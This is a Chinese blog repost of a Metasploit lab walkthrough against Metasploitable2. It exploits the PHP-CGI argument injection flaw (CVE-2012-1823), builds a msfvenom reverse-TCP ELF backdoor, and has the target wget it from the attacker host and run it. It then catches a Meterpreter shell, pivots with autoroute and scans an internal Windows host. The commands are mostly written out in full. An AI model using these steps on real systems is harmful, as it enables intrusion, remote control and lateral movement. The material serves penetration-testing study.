2020-10-17

最新推荐文章于 2024-01-16 15:15:57 发布
最新推荐文章于 2024-01-16 15:15:57 发布
阅读量166 收藏
点赞数
分类专栏: 渗透 Metasploit PHP-CGI查询字符串参数漏洞 渗透 Metasploit  渗透 文章标签: linux
原文链接:https://blog.csdn.net/l1028386804/article/details/86357792
版权

攻击机:Kali 192.168.109.137

靶机: Metasploitable2 192.168.109.159

内网另一台主机 Windows Server 2012

工具:Metasploit

目标计算机上的漏洞编号为CVE id 2012-1823,完整的名称为PHP-CGI查询字符串参数漏洞,根据PHP主页的信息,当PHP使用基于CGI的设置(如Apache的mod_cgid)时,php-cgi就会收到一个查询字符串参数作为命令行参数(这个命令行参数可以是-s、-d或者-c),它将被传递到php-cgi程序,从而导致源代码泄露和任意代码执行。因此,一个远程的、未经授权的攻击者可以借此获取敏感信息,利用目标计算机来进行Dos攻击,或者取得Web服务器执行任意代码的权限。

1.开启MSF

msfconsole

2.查找MSF中与CVE id 2012-1823漏洞匹配的模块

search "php 5.2.4"

3.对漏洞进行渗透

 

  1. use exploit/multi/http/php_cgi_arg_injection

  2. show options

  3. set RHOST 192.168.109.159

  4. show options

  5. show payloads

  6. set payload php/meterpreter/reverse_tcp

  7. show options

  8. set LHOST 192.168.109.137

  9. exploit

现在,我们攻克了IP地址为192.168.109.159的内部系统了,现在我们需要将Meterpreter提升为更高的权限

4.生成木马文件

在攻击机Kali上新开一个命令行终端,执行如下命令:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST 192.168.109.137 LPORT 4444 -f elf > backdoor.elf

注:elf是Linux系统下的默认扩展名

5.启动Kali上的Apache服务,并将backdoor.elf放置到服务器中

 

  1. service apache2 start

  2. mv backdoor.elf /var/www/html/

这样,就可以让目标系统从我们的计算机中下载这个木马文件了。

6.在目标机上下载木马文件

切换到第3步的终端,执行命令:

 

  1. shell

  2. wget http://192.168.109.137/backdoor.elf

即将木马文件下载到了目标机上

7.在新开启的终端上执行如下命令

 

  1. msfconsole

  2. use exploit/multi/handler

  3. set payload linux/x86/meterpreter/reverse_tcp

  4. set LHOST 192.168.109.137

  5. set LPORT 4444

  6. exploit

8.在目标机上运行木马文件

切换到第3步的终端,执行命令:

 

  1. chmod 7777 backdoor.elf

  2. ./backdoor.elf

9.查看反弹的Meterpreter终端

回到新开启的终端上查看,此时,我们看到已经反弹回Meterpreter命令行了。

接下来,就可以在Meterpreter终端进行操作了。

下面,我们渗透内部网络。

10. 查看ARP内容

arp

由输出可以看出,内网中有另一主机IP地址为:192.168.109.141

为了渗透进入这个内部网络,需要在成功渗透的主机上使用autoroute命令来设置跳板。

11.设置跳板

在Meterpreter终端执行:

 

  1. run autoroute -p

  2. run autoroute -s 192.168.109.0 255.255.255.0

  3. run autoroute -p

此时,我们的MSF就可以通过这个Meterpreter会话连接到内部网络。

12.将Meterpreter会话切换到后台

background

13.对内网主机192.168.109.141进行端口扫描

 

  1. use auxiliary/scanner/portscan/tcp

  2. show options

  3. setg RHOSTS 192.168.109.141

  4. run

注意:设置RHOSTS的值时,这里使用的是setg命令,这样就会使RHOSTS的值设置为全局的192.168.109.141,从而无需反复输入这个命令。

这里,我们仅仅看到少数几个开发的端口,接下来,我们使用MSF中对应工具对常见的端口再进行详细的扫描。使用auxiliary/scanner/http/http_header模块对目标80和8080端口进行扫描,以发现在这两个端口上运行的服务。

14.查看在80、8080端口上运行的服务

 

  1. use auxiliary/scanner/http/http_header

  2. set RHOSTS 192.168.109.141

  3. set HTTP_METHOD GET

  4. run

  5. set RPORT 8080

  6. run

从输出中可以看到,目标计算机80端口上运行着最新的IIS 8.5, 这是一个很难渗透的服务器,因为并没有在这个服务器上发现高危的漏洞。不过,在8080端口上运行着HFS 2.3,这个软件存在着一个远程代码执行漏洞。

mekeloove
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
红日靶场vulnstack1 内网渗透学习
snowlyzz的博客
09-18 2116
红日靶场渗透教程
MSF内网渗透实战
hackzkaq的博客
05-17 3774
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全-小熊保安 本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀. 一、MSF生成木马上线目标 1. 生成木马 使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f ex
生命在于学习——MSF初体验(二)
易水哲的博客
10-21 2173
MSF初体验(二)——Meterpreter命令
内网渗透-msf及socks代理转发
baynk的博客
05-29 8636
0x00 学习环境 拓扑如上,现在已经拥有了WIN2008的meterpreter权限 希望通过此主机进行代理转发,从而使msf能够攻击WIN7从而拿到权限。 0x01 路由转发1 先在meterpreter中使用route进行查看WIN2008所在的网段信息 通过background回到msf,使用route增加对应路由route add 172.16.10.0 255.255.255.0 1,1是挂起的session编号。 可以看到已经有路由了,用ms17-010打win7也可以成功拿到she
Kali Linux渗透测试实战:Msfvenom木马生成与攻防实战教程
08-19
1、课程概要       本课程主要分享Kali Linux渗透测试实战:Msfvenom生成木马攻防实战教程! 2、课程目标         本课程致力于帮助广大学员掌握Msfvenom木马生成与攻防实战技巧! 3、适合人员        本课程适合兴趣计算机与网络安全技术的学员观看学习! 4、特别说明        本课程支持一次购买,永久观看,请广大学员们放心选购!
Draft 2020-10-17 05:16:21-数据集
03-19
10.csv 9.csv 11.csv 12.csv 14.csv 15.csv 17.csv 16.csv 18.csv 19.csv 20.csv 22.csv 23.csv 25.csv 24.csv 26.csv 27.csv 28.csv 29.csv 31.csv 30.csv 32.csv 33.csv 35.csv 34.csv ...
TSDAS 198-2020 DHA营养强化鸡蛋
04-08
TSDAS 198-2020 DHA营养强化鸡蛋 本文件规定了DHA营养强化鸡蛋的术语和定义、分级、要求、试验方法、检验规则、包装、标识、运输、贮存、保质期等内容。下面是根据本文件生成的知识点: 1. DHA营养强化鸡蛋的定义...
听力录音14.1脚本.pdf-2020-10-05-10-36-17-790.docx
12-05
听力录音14.1脚本.pdf-2020-10-05-10-36-17-790.docx
9、2020 CSP-S提高组第一轮比赛-C++试题及解析.pdf
09-02
9、2020 CSP-S提高组第一轮比赛-C++试题及解析.pdf
bandicam 2020-11-04 17-10-06-422.mp4
11-04
本视频用来放在博客文章中,演示代码的展示效果,方便大家查阅和练习,更加方便的熟悉代码开发操作,请勿下载,下载了也没有啥用,谢谢观看
利用msfvenom制作windows木马及免杀马
热门推荐
linxaiomo
04-10 1万+
实验环境:kali(10.250.70.251) Windows x32位(10.250.70.252) 第一步:确保二者之间的网络能够相互ping通 注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。 第二步:打开kali启动msfvenom,制作木马 制作常规的木马: msfvenom -a x86 --platform window...
后渗透之meterpreter使用攻略
钻石
01-06 8285
本文转载来源:https://xz.aliyun.com/t/2536 Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。 0x01.系统命令 1)基本系统命令 sessions #sessions –h 查看帮助 sessi...
kali-msfvenom生成远控木马
最新发布
Ryongao
01-16 573
本文章仅限于网络安全教学,严禁用于非法途径。若有人因此作出危害网络安全行为后果自负,与本人无关。
内网渗透之MSF 路由转发
椰树ii
11-22 8667
    如果我已经拿到了一台内网服务器,需要使用MSF去访问内网资源,这时候就需要在msf中添加去往“内网网段”的路由。     MSF跳板实现过程:            需要获得一个msf的session会话;            获取内网地址网段;            在msf中添加”内网网段“的路由;            获取内网网段地址:           例如:meterpre...
metasploit小白教程总结
sweetie 的博客
01-03 2351
msf小白学习教程一 1.msf是什么? msf全称:metasplpit 作用:Metasploit是一个渗透测试平台 环境:kali-linux 自动搭建了msf环境 2.msf的详细分解 在这边我就化繁为简,把一些我感觉重要常用的功能详细的讲解一番。 2.1搜索模块 首先肯定是启动msf,启动就很简单了,在kali命令行输入:msfconsole 如果记不住,可以直接:msfc然后加一个tab,然后就会自动补全,回车就好了。 2.1.1 搜索模块命令:search 命令介绍:msfconsole
突破meterpreter建立永久访问权限访问其他主机——借刀杀人
渗透测试
05-09 1680
文章目录前言一、使用场景二、实施步骤1.渗透b主机2.建立socks代理服务器3.设置浏览器代理4.设置永久访问权限总结 前言 渗透目标主机,对目标主机搭建跳板建立代理服务器,通过代理主机访问其他主机,不留痕迹 一、使用场景 主机a想访问c无法访问,c只让特定的IP地址访问,例如b,此时就可以先渗透b,在上面搭建跳板建立代理服务器,通过代理服务器访问c 本期例子,a主机使用kali,b主机winxp,c主机linux 二、实施步骤 1.渗透b主机 因为目标位winxp,先使用最常用的MS08_06
Meterpreter命令详解
sweelg的博客
05-29 2291
0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获.
metasploit渗透测试笔记(内网渗透篇)
baidu_22850205的专栏
11-02 958
0x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行。本地监听即可获得meterpreter shell。 reverse_tcp/http/https => exe => victim => shell reverse_tcp windows: msfpayload wi
MSF命令大全
L_lemo004的博客
10-20 5575
0x00 Payload生成 Windows/Linux Windows: msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径/文件名 Linux: msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f elf > 保存路径/文件名 Web PHP: msfvenom -p php/meter
A集合: [{begintime:2020-01-01 00:04:00,endtime:2020-01-01 00:06:00}, {begintime:2020-01-01 00:01:05,endtime:2020-01-01 00:03:15}, {begintime:2020-01-01 00:09:00,endtime:2020-01-01 00:10:00}, {begintime:2020-01-01 00:07:35,endtime:2020-01-01 00:08:40}, {begintime:2020-01-01 00:12:00,endtime:2020-01-01 00:17:00}, {begintime:2020-01-01 00:12:05,endtime:2020-01-01 00:13:10}, {begintime:2020-01-01 00:19:00,endtime:2020-01-01 00:21:00}, {begintime:2020-01-01 00:15:20,endtime:2020-01-01 00:20:45}]  期望得到的输出结果: [{begintime:2020-01-01 00:01:05,endtime:2020-01-01 00:03:15}, {begintime:2020-01-01 00:04:00,endtime:2020-01-01 00:06:00}, {begintime:2020-01-01 00:07:35,endtime:2020-01-01 00:08:40}, {begintime:2020-01-01 00:09:00,endtime:2020-01-01 00:10:00}, {begintime:2020-01-01 00:12:00,endtime:2020-01-01 00:21:00}]
04-23
好的,根据您的描述,您想要对给定的A集合进行排序,按照每个时间段的开始时间顺序,然后合并时间段,使得它们不重叠,对吗? 如果是的话,可以使用以下代码实现: ``` # 对时间段按照开始时间进行排序 A = sorted(A, key=lambda x: x['begintime']) merged = [] # 对时间段进行合并 for interval in A: if not merged or merged[-1]['endtime'] < interval['begintime']: merged.append(interval) else: merged[-1]['endtime'] = max(merged[-1]['endtime'], interval['endtime']) # 输出结果 print(merged) ``` 输出结果应该是: ``` [{begintime:2020-01-01 00:01:05,endtime:2020-01-01 00:03:15}, {begintime:2020-01-01 00:04:00,endtime:2020-01-01 00:06:00}, {begintime:2020-01-01 00:07:35,endtime:2020-01-01 00:08:40}, {begintime:2020-01-01 00:09:00,endtime:2020-01-01 00:10:00}, {begintime:2020-01-01 00:12:00,endtime:2020-01-01 00:21:00}] ``` 希望这能回答您的问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值